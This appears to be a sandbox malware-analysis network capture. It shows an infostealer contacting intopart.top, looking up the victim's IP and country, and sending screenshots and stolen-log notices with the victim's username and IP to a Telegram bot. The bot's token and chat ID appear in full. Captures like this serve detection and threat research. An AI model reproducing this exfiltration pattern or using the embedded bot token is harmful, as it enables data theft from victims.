Apr 29, 2024 01:04:29.979368925 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jWnRr2iW7JcZEy4uvKLkSOBFElspEsVTPJl4znuLHlLjo7rIwccROqK9iQkj39BNKU1H%2BhiZKeN0CTlWsXA6d08m6hLr4ncSrfd0%2FCyDhSYPyAPWKn3bkyo88dXv3zo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab11088f9e26f-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:29.979391098 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49886	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:30.205161095 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:30.315038919 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:30.315232038 CEST	1080	OUT	Data Raw: 58 5c 5a 5d 55 58 5b 54 54 56 50 51 5a 53 51 57 5b 5d 5e 48 54 52 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\Z]UX[TTVPQZSQW[]^HTRPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2>0^ !#2X"-%<U0=Y(*.W(+0(;-#3&&: Z/!Z/0
Apr 29, 2024 01:04:30.703939915 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z633ImyOkZ31PN627b6xL9k7IH3%2Fy7qNI38%2Fhj0%2BFTr3naIGQYb94Tmv3UADF%2B2rkArvjghhEmgeMGpLogM7jiu4xNRCm5g0uayqRapV5Lh9NInlBb4PdRF4Zpa9t5A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab11528bf1054-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:30.703953981 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:30.703965902 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49887	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:30.941590071 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:31.052455902 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:31.052603006 CEST	1080	OUT	Data Raw: 5d 5e 5f 5f 55 5d 5e 53 54 56 50 51 5a 51 51 54 5b 5e 5e 44 54 59 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^__U]^STVPQZQQT[^^DTYPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y1><^ %>/53'8=:S(3Q$'V/<940>$: Z/!Z/
Apr 29, 2024 01:04:31.335042000 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ep3ySC3TqwAbN6XpfXS%2F3rDbCratJdPjdAi7nYlKUgEIsNCFebxRNLAuV%2BFy5iKs48OmcvUzaSIKXI6b5A56RVJzvXueh86HvWu%2Bsst3Yo3h6LuPm%2BIdT8qqjOeKnpk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab119cdc8e13b-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:31.335067034 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:31.335073948 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	34.117.186.192	443	5936	C:\portintosvc\driverInto.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:02:10 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-04-28 23:02:10 UTC	361	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Sun, 28 Apr 2024 23:02:10 GMT content-type: text/plain; charset=utf-8 Content-Length: 12 access-control-allow-origin: * x-envoy-upstream-service-time: 0 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:02:10 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 30 Data Ascii: 81.181.62.90

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	34.117.186.192	443	5936	C:\portintosvc\driverInto.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:02:11 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io
2024-04-28 23:02:11 UTC	504	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Sun, 28 Apr 2024 23:02:11 GMT content-type: text/html; charset=utf-8 Content-Length: 3 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 1 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:02:11 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	149.154.167.220	443	5936	C:\portintosvc\driverInto.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:02:12 UTC	255	OUT	POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="f4f047d2-73f9-4a98-88b4-47c11c582381" Host: api.telegram.org Content-Length: 98854 Expect: 100-continue Connection: Keep-Alive
2024-04-28 23:02:12 UTC	40	OUT	Data Raw: 2d 2d 66 34 66 30 34 37 64 32 2d 37 33 66 39 2d 34 61 39 38 2d 38 38 62 34 2d 34 37 63 31 31 63 35 38 32 33 38 31 0d 0a Data Ascii: --f4f047d2-73f9-4a98-88b4-47c11c582381
2024-04-28 23:02:12 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-04-28 23:02:12 UTC	11	OUT	Data Raw: 2d 34 31 37 32 36 39 36 34 33 38 Data Ascii: -4172696438
2024-04-28 23:02:12 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 34 66 30 34 37 64 32 2d 37 33 66 39 2d 34 61 39 38 2d 38 38 62 34 2d 34 37 63 31 31 63 35 38 32 33 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a Data Ascii: --f4f047d2-73f9-4a98-88b4-47c11c582381Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2024-04-28 23:02:12 UTC	131	OUT	Data Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 63 62 63 33 66 31 30 37 34 33 64 37 35 34 63 61 33 38 31 62 33 61 64 32 31 30 64 36 65 36 38 62 36 39 66 32 35 36 32 39 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 37 38 33 38 37 35 0a 49 50 3a 20 38 31 2e 31 38 31 2e 36 32 2e 39 30 0a 47 45 4f 3a 20 55 53 0a Data Ascii: new user connect !ID: cbc3f10743d754ca381b3ad210d6e68b69f25629Comment: Username: userPC Name: 783875IP: 81.181.62.90GEO: US
2024-04-28 23:02:12 UTC	146	OUT	Data Raw: 0d 0a 2d 2d 66 34 66 30 34 37 64 32 2d 37 33 66 39 2d 34 61 39 38 2d 38 38 62 34 2d 34 37 63 31 31 63 35 38 32 33 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: --f4f047d2-73f9-4a98-88b4-47c11c582381Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-04-28 23:02:12 UTC	4096	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-04-28 23:02:12 UTC	4096	OUT	Data Raw: 0d 1d e8 19 ab e1 9f f9 19 f4 cf fa f8 4f e7 5a ff 00 13 f5 0b 9b 7d 67 ec 51 49 b6 1b 9b 48 8c a0 75 6d af 2e 07 d3 e6 fd 05 63 f8 6b fe 46 6d 37 fe be 53 f9 d7 a4 f8 83 c1 5a 6f 88 ef e3 bc bc 9e ed 24 48 84 40 42 ea 06 01 27 ba 9e 7e 63 5e 2e 2e b5 3a 58 d8 ce a6 dc bf ab 3e 8b 2e a5 52 b6 02 50 a7 bf 37 e8 8f 0c 04 ab 06 52 41 07 20 8e d5 be 9e 25 b8 83 57 b4 d7 21 6f f4 e5 50 97 2b d0 4d 80 06 4f fb c3 af b8 cf 71 5d ff 00 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 27 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 69 3c cb 09 3f 8a ff 00 70 e1 96 e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 b2 Data Ascii: OZ}gQIHum.ckFm7SZo$H@B'~c^..:X>.RP7RA %W!oP+MOq]~E'~Ei<?p -okk\|sjbKHT`3yVRM9sZ*PhP
2024-04-28 23:02:12 UTC	4096	OUT	Data Raw: 4e 30 c8 a4 7a 62 9b ca e3 29 73 49 dd da df d7 de 4c 73 99 c2 2a 30 8d 95 ee f7 29 31 b4 91 f5 03 a7 43 e5 59 96 22 15 0a 40 c6 39 20 1e 40 27 24 03 c8 18 aa 93 49 67 0e a3 0e af 0d ec 53 dc c7 a5 c7 69 1d a4 71 48 24 13 79 02 23 b8 b2 04 da 0e 4e 43 12 70 06 39 c8 d8 f2 80 18 5c 63 d0 53 3c 84 0d 9f 29 41 f5 c5 55 6c bd 55 a7 18 37 f0 ff 00 c3 19 e1 f3 49 52 a9 3a 8a 3f 17 fc 39 81 a3 cb 15 8d ff 00 86 0c b3 c7 19 b0 d3 ef 60 9d e5 81 9d 23 92 43 3e cd cb b4 ee 07 7a e7 00 8e 79 ab b6 73 e9 df da 36 b7 17 57 fa 7b 5e 59 d8 95 12 8b 59 a3 b4 9a 7d e4 c6 16 34 8b e5 45 07 24 04 50 cc 3a 1c 96 ad 03 14 67 aa 29 fc 28 f2 62 c6 3c b4 c7 fb a2 b9 ff 00 b2 23 cd cc a4 d6 ff 00 8d ff 00 cc ec fe dd 9b 8d a5 04 ff 00 a5 fe 46 2b d9 40 96 57 76 33 ea b6 ef 2d d4 Data Ascii: N0zb)sILs*0)1CY"@9 @'$IgSiqH$y#NCp9\cS<)AUlU7IR:?9`#C>zys6W{^YY}4E$P:g)(b<#F+@Wv3-
2024-04-28 23:02:12 UTC	4096	OUT	Data Raw: 3e b6 ff 00 34 79 98 ca 52 8e 0b 11 46 ac 7e c5 ec fb ab 34 fd 7c fb 3f 33 9a a3 8a 5a 4e 2b ed ee 7e 60 14 51 45 00 6a f8 67 fe 46 7d 37 fe be 17 f9 d7 b5 92 00 24 90 00 e4 93 5e 29 e1 af f9 19 b4 df fa f8 4f e7 5d ce ba d3 f8 8f c4 ab e1 b8 a6 78 6c 60 88 4f 7e c8 70 5f 3f 75 3f 91 fc 7d ab e7 b3 4a 7e d3 12 93 76 4a 37 7e 97 67 d5 e4 95 3d 9e 11 b4 ae dc ac bd 6c 8d 0b 9f 1c f8 6a d6 66 8a 4d 56 32 c3 af 96 8f 20 fc d4 11 53 2e a9 6b ae 41 14 da 35 cd bd d3 43 2e f6 43 21 42 01 56 5e 78 24 75 f4 ac eb bd 6f c2 9e 13 91 74 d3 14 51 3a 80 5a 38 61 dc 47 a1 63 eb f5 e6 aa ea 97 72 5b 5b 8d 43 c2 5a 45 ac 86 ea 06 96 4b f5 45 0a 15 79 2b 8e 0e e3 e9 fc f1 c7 17 d5 e3 24 b9 62 d5 f6 6e d6 fc bf 56 7a 9f 58 9c 5b e6 92 76 dd 2b df f3 fd 11 9f e3 5d 36 55 b6 Data Ascii: >4yRF~4\|?3ZN+~`QEjgF}7$^)O]xl`O~p_?u?}J~vJ7~g=ljfMV2 S.kA5C.C!BV^x$uotQ:Z8aGcr[[CZEKEy+$bnVzX[v+]6U
2024-04-28 23:02:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-28 23:02:13 UTC	1638	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 28 Apr 2024 23:02:13 GMT Content-Type: application/json Content-Length: 1249 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":211,"from":{"id":7126538506,"is_bot":true,"first_name":"MaxVinnik","username":"VinnikOtctyk_bot"},"chat":{"id":-4172696438,"title":"\u0414\u0435\u043d\u0447\u0456\u043a\u0456 \u043c\u0430\u0439\u043d\u0435\u0440\u0438","type":"group","all_members_are_administrators":true},"date":1714345333,"photo":[{"file_id":"AgACAgIAAxkDAAPTZi7Vdd1KwJjrQhRuKIId_98rtdEAAhbbMRsKdHlJe1RPKakdYsYBAAMCAANzAAM0BA","file_unique_id":"AQADFtsxGwp0eUl4","file_size":1170,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAAPTZi7Vdd1KwJjrQhRuKIId_98rtdEAAhbbMRsKdHlJe1RPKakdYsYBAAMCAANtAAM0BA","file_unique_id":"AQADFtsxGwp0eUly","file_size":15990,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAAPTZi7Vdd1KwJjrQhRuKIId_98rtdEAAhbbMRsKdHlJe1RPKakdYsYBAAMCAAN4AAM0BA","file_unique_id":"AQADFtsxGwp0eUl9","file_size":66774,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAAPTZi7Vdd1KwJjrQhRuKIId_98rtdEAAhbbMRsKdHlJe1RPKakdYsYBAAMCAAN5AAM0BA","file_unique_id":"AQADFtsxGwp0eUl-","file_size":98262,"width":1280,"h [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49770	34.117.186.192	443	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:03:06 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-04-28 23:03:07 UTC	361	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Sun, 28 Apr 2024 23:03:06 GMT content-type: text/plain; charset=utf-8 Content-Length: 12 access-control-allow-origin: * x-envoy-upstream-service-time: 1 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:03:07 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 30 Data Ascii: 81.181.62.90

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49771	34.117.186.192	443	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:03:07 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io
2024-04-28 23:03:07 UTC	504	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Sun, 28 Apr 2024 23:03:07 GMT content-type: text/html; charset=utf-8 Content-Length: 3 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:03:07 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49773	149.154.167.220	443	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:03:07 UTC	255	OUT	POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="e318265f-a5ec-49e0-abbc-3a95e0368c35" Host: api.telegram.org Content-Length: 98799 Expect: 100-continue Connection: Keep-Alive
2024-04-28 23:03:08 UTC	40	OUT	Data Raw: 2d 2d 65 33 31 38 32 36 35 66 2d 61 35 65 63 2d 34 39 65 30 2d 61 62 62 63 2d 33 61 39 35 65 30 33 36 38 63 33 35 0d 0a Data Ascii: --e318265f-a5ec-49e0-abbc-3a95e0368c35
2024-04-28 23:03:08 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-04-28 23:03:08 UTC	11	OUT	Data Raw: 2d 34 31 37 32 36 39 36 34 33 38 Data Ascii: -4172696438
2024-04-28 23:03:08 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 33 31 38 32 36 35 66 2d 61 35 65 63 2d 34 39 65 30 2d 61 62 62 63 2d 33 61 39 35 65 30 33 36 38 63 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a Data Ascii: --e318265f-a5ec-49e0-abbc-3a95e0368c35Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2024-04-28 23:03:08 UTC	85	OUT	Data Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 63 62 63 33 66 31 30 37 34 33 64 37 35 34 63 61 33 38 31 62 33 61 64 32 31 30 64 36 65 36 38 62 36 39 66 32 35 36 32 39 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 4c 6f 67 20 73 69 7a 65 3a 20 31 33 39 37 31 39 Data Ascii: Log collectedID: cbc3f10743d754ca381b3ad210d6e68b69f25629Comment: Log size: 139719
2024-04-28 23:03:08 UTC	146	OUT	Data Raw: 0d 0a 2d 2d 65 33 31 38 32 36 35 66 2d 61 35 65 63 2d 34 39 65 30 2d 61 62 62 63 2d 33 61 39 35 65 30 33 36 38 63 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: --e318265f-a5ec-49e0-abbc-3a95e0368c35Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-04-28 23:03:08 UTC	4096	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-04-28 23:03:08 UTC	4096	OUT	Data Raw: 0d 1d e8 19 ab e1 9f f9 19 f4 cf fa f8 4f e7 5a ff 00 13 f5 0b 9b 7d 67 ec 51 49 b6 1b 9b 48 8c a0 75 6d af 2e 07 d3 e6 fd 05 63 f8 6b fe 46 6d 37 fe be 53 f9 d7 a4 f8 83 c1 5a 6f 88 ef e3 bc bc 9e ed 24 48 84 40 42 ea 06 01 27 ba 9e 7e 63 5e 2e 2e b5 3a 58 d8 ce a6 dc bf ab 3e 8b 2e a5 52 b6 02 50 a7 bf 37 e8 8f 0c 04 ab 06 52 41 07 20 8e d5 be 9e 25 b8 83 57 b4 d7 21 6f f4 e5 50 97 2b d0 4d 80 06 4f fb c3 af b8 cf 71 5d ff 00 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 27 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 69 3c cb 09 3f 8a ff 00 70 e1 96 e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 b2 Data Ascii: OZ}gQIHum.ckFm7SZo$H@B'~c^..:X>.RP7RA %W!oP+MOq]~E'~Ei<?p -okk\|sjbKHT`3yVRM9sZ*PhP
2024-04-28 23:03:08 UTC	4096	OUT	Data Raw: 4e 30 c8 a4 7a 62 9b ca e3 29 73 49 dd da df d7 de 4c 73 99 c2 2a 30 8d 95 ee f7 29 31 b4 91 f5 03 a7 43 e5 59 96 22 15 0a 40 c6 39 20 1e 40 27 24 03 c8 18 aa 93 49 67 0e a3 0e af 0d ec 53 dc c7 a5 c7 69 1d a4 71 48 24 13 79 02 23 b8 b2 04 da 0e 4e 43 12 70 06 39 c8 d8 f2 80 18 5c 63 d0 53 3c 84 0d 9f 29 41 f5 c5 55 6c bd 55 a7 18 37 f0 ff 00 c3 19 e1 f3 49 52 a9 3a 8a 3f 17 fc 39 81 a3 cb 15 8d ff 00 86 0c b3 c7 19 b0 d3 ef 60 9d e5 81 9d 23 92 43 3e cd cb b4 ee 07 7a e7 00 8e 79 ab b6 73 e9 df da 36 b7 17 57 fa 7b 5e 59 d8 95 12 8b 59 a3 b4 9a 7d e4 c6 16 34 8b e5 45 07 24 04 50 cc 3a 1c 96 ad 03 14 67 aa 29 fc 28 f2 62 c6 3c b4 c7 fb a2 b9 ff 00 b2 23 cd cc a4 d6 ff 00 8d ff 00 cc ec fe dd 9b 8d a5 04 ff 00 a5 fe 46 2b d9 40 96 57 76 33 ea b6 ef 2d d4 Data Ascii: N0zb)sILs*0)1CY"@9 @'$IgSiqH$y#NCp9\cS<)AUlU7IR:?9`#C>zys6W{^YY}4E$P:g)(b<#F+@Wv3-
